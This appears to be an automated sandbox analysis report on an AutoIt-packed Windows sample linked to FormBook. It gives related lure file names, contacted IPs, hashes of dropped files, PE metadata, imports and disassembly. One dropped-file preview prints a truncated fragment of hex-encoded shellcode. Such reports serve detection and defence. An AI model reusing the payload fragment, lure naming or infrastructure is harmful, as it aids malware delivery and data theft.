	Payment Advice for Invoice 2024 0904.vbs	Get hash	malicious	FormBook	Browse	91.195.240.117
	2x6j7GSmbu.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
	HYCO_Invoices MS2 & MS3.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
	Arrival Notice.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	RFQ.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
	NEW-ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	91.195.240.19

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut6E13.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.9915076053671905
Encrypted:	true
SSDEEP:	6144:v5yjWSCrZ1ZLdDe7WqCenYolki+QGuYWzxnCpHfYN0I9M:wjQ1gKqpYskvsxnCpH+0Iu
MD5:	A5705AEBF2E5E1011654E28DC6889576
SHA1:	1087AB4E292A108696823F1A36E325CFCD974980
SHA-256:	5EF6E57E0E62C2D871977F24A29F15437D33E4CF9BC51D4EC44B12E1FFDFE43F
SHA-512:	92D211041B45C52E2717F6D8D83FE83779497050242E17499FF48016B488DEBC314E6B2EE611B6EA11AA57014B34AE694AE819582BA448164511BAB3A673C491
Malicious:	false
Reputation:	low
Preview:	.....PTHI..E..n.TK..mOM...RPTHIOMELELFPRPTHIOMELELFPRPTH.OMEBZ.HP.Y.i.N..m.$/#r &'.=,(l&-(>=$t,o?0"e%(p...h$ ) bHALtRPTHIOM<ML.{05.i(..p%+.V...j4/.U..y,!.H...u/..,/.m27.HIOMELEL..RP.IHO.-..LFPRPTHI.MGMNMMPR@PHIOMELELF.GPTHYOMElALFP.PTXIOMGLEJFPRPTHIIMELELFPRpPHIMMELELFRR..HI_ME\ELFPBPTXIOMELE\FPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELF~&5,<IOM.CALF@RPTXMOMULELFPRPTHIOMELeLF0RPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOME

C:\Users\user\AppData\Local\Temp\aut6E72.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe
File Type:	data
Category:	dropped
Size (bytes):	9878
Entropy (8bit):	7.598512129507835
Encrypted:	false
SSDEEP:	192:mS5jnkklrTefgLyCKomzBVNuVROF9cfsSEyXNrKf5aKqFdPO72gd61M:VnI0lHmrNiWeXNrKfkKKPm2A61M
MD5:	C5704EB049F1B9A26F15958ABB1A0BDF
SHA1:	EC63B53433E61F2AC183F37703034BF65D3ABD93
SHA-256:	B1F38E19934F119DD6E26AF6FAE0CF6AD92F4108B97C5A2032F7F3C2E9D5C9AA
SHA-512:	01AF117A0431C7E981DF1CB3DD58DEA747B61961560E097E8E89EFDC4C3FF83C431EED554FC6623A5EDB87A9A562A133AF275253EF1415692652C4C21F9F1368
Malicious:	false
Reputation:	low
Preview:	EA06..p.P.tY..kD.L'....8.M.t..o7.Q'.)..aC.P......0.Mf.....8..lv;..e0..&.i...8.X.....m6.Nf.Y...9.M@..d.!,3y.........e.6., ..%..a.X....-.q3...zs0.Nf`.].Y'3+..d....s4.l&..........\|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.\|f #^...j......l.....l.5....>0..Xf....M.^.8.N@.=7.z...#.$...`!..H&.>_L.p..............@\|..6..(....ka..&...Xf@0........\|.=..g...........`.A..b.......P.O.id...\|.)....4....\.M.4.;...K..4\|. F...e.f..s....id..p.....4....s`./.....X. ..%..K.;-.o8...k ..4..`w..qd..f`....l.....V0...lS..m4.Y.......>.5...S...f&.+..Af....<..f....gl`....g.d..#4.x..#1.X...cV....0..BV0.NL@.;1.X..e1.Y,S[(.#6.,.d.....f.I......B3p....;2.X.se.Y..@.Fn.....f`...J&.9.......!93.X...c6).$.6.....h`...@.....3f.Lg3I..h....l.Z.,.....[%.ec...`....,vj...%.sb.X.,...p.....f.....g ...!8.....c.`!......3d...l.2.,...g.K..i0...B.....@.....j.0..B...Fl.....f....X.I..P...@

C:\Users\user\AppData\Local\Temp\cerecloths

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.9915076053671905
Encrypted:	true
SSDEEP:	6144:v5yjWSCrZ1ZLdDe7WqCenYolki+QGuYWzxnCpHfYN0I9M:wjQ1gKqpYskvsxnCpH+0Iu
MD5:	A5705AEBF2E5E1011654E28DC6889576
SHA1:	1087AB4E292A108696823F1A36E325CFCD974980
SHA-256:	5EF6E57E0E62C2D871977F24A29F15437D33E4CF9BC51D4EC44B12E1FFDFE43F
SHA-512:	92D211041B45C52E2717F6D8D83FE83779497050242E17499FF48016B488DEBC314E6B2EE611B6EA11AA57014B34AE694AE819582BA448164511BAB3A673C491
Malicious:	false
Reputation:	low
Preview:	.....PTHI..E..n.TK..mOM...RPTHIOMELELFPRPTHIOMELELFPRPTH.OMEBZ.HP.Y.i.N..m.$/#r &'.=,(l&-(>=$t,o?0"e%(p...h$ ) bHALtRPTHIOM<ML.{05.i(..p%+.V...j4/.U..y,!.H...u/..,/.m27.HIOMELEL..RP.IHO.-..LFPRPTHI.MGMNMMPR@PHIOMELELF.GPTHYOMElALFP.PTXIOMGLEJFPRPTHIIMELELFPRpPHIMMELELFRR..HI_ME\ELFPBPTXIOMELE\FPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELF~&5,<IOM.CALF@RPTXMOMULELFPRPTHIOMELeLF0RPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOMELELFPRPTHIOME

C:\Users\user\AppData\Local\Temp\windigos

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe
File Type:	ASCII text, with very long lines (28714), with no line terminators
Category:	dropped
Size (bytes):	28714
Entropy (8bit):	3.595429103790669
Encrypted:	false
SSDEEP:	768:DiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNboE+I026c024vfF3if6h:DiTZ+2QoioGRk6ZklputwjpjBkCiw2Ra
MD5:	95906F0053A9BCF02073CD5CB1A2E962
SHA1:	707E57052BC5B5FC37894B6C3DB458D3BA67BEFB
SHA-256:	E91F1F2B3FDE0A550800AD20B6E7D2EA869D51F17304AE64653D50CA18630BEE
SHA-512:	50826AE43266667D5418ED4351775908F090BDAA07A864D2620FDF31947EBA346C371A29278C9A2E827E108A23C74DEC53A38C53255ADC49364DA0B1340E3854
Malicious:	false
Reputation:	low
Preview:	8BCE895DD08975C8663BC2772D8B5F0C8BD08BFE0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c0000006689857e

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.100807734555197
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe
File size:	1'155'584 bytes
MD5:	ce1f8921d525728d0903cb81e61ada9e
SHA1:	a0b7228ab142599fe9f8d06421abfb4589fdf00a
SHA256:	0382d0b9421be9a1c5a084869be5742803d4ec3f211294a4c96f45444952ab55
SHA512:	616ffb6a1adf126ba8ad2592f79a0327e73153e43c8cfa9c4898102ad42326b60c25939177993d35aedec1678316e5997148b00d477d074f2aa8a4dbcb04ad2c
SSDEEP:	24576:jAHnh+eWsN3skA4RV1Hom2KXMmHaHbdJLq9Su1VK5:uh+ZkldoPK8YaHbrrF
TLSH:	9535AD0273D1C036FFABA2739B6AB60156BD79250133852F13981DB9BD701B2277E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6621AA4E [Thu Apr 18 23:18:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F84109CECDDh
jmp 00007F84109C1A94h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F84109C1C1Ah
cmp edi, eax
jc 00007F84109C1F7Eh
bt dword ptr [004C41FCh], 01h
jnc 00007F84109C1C19h
rep movsb
jmp 00007F84109C1F2Ch
cmp ecx, 00000080h
jc 00007F84109C1DE4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F84109C1C20h
bt dword ptr [004BF324h], 01h
jc 00007F84109C20F0h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F84109C1DBDh
test edi, 00000003h
jne 00007F84109C1DCEh
test esi, 00000003h
jne 00007F84109C1DADh
bt edi, 02h
jnc 00007F84109C1C1Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F84109C1C23h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F84109C1C75h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x4fb0c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x118000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x4fb0c	0x4fc00	331beb703bd1c0943489e434af19e70c	False	0.9172187255094044	data	7.870355592779237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x118000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x46da4	data			1.000330792661916
RT_GROUP_ICON	0x11755c	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1175d4	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1175e8	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1175fc	0x14	data	English	Great Britain	1.25
RT_VERSION	0x117610	0x10c	data	English	Great Britain	0.585820895522388
RT_MANIFEST	0x11771c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

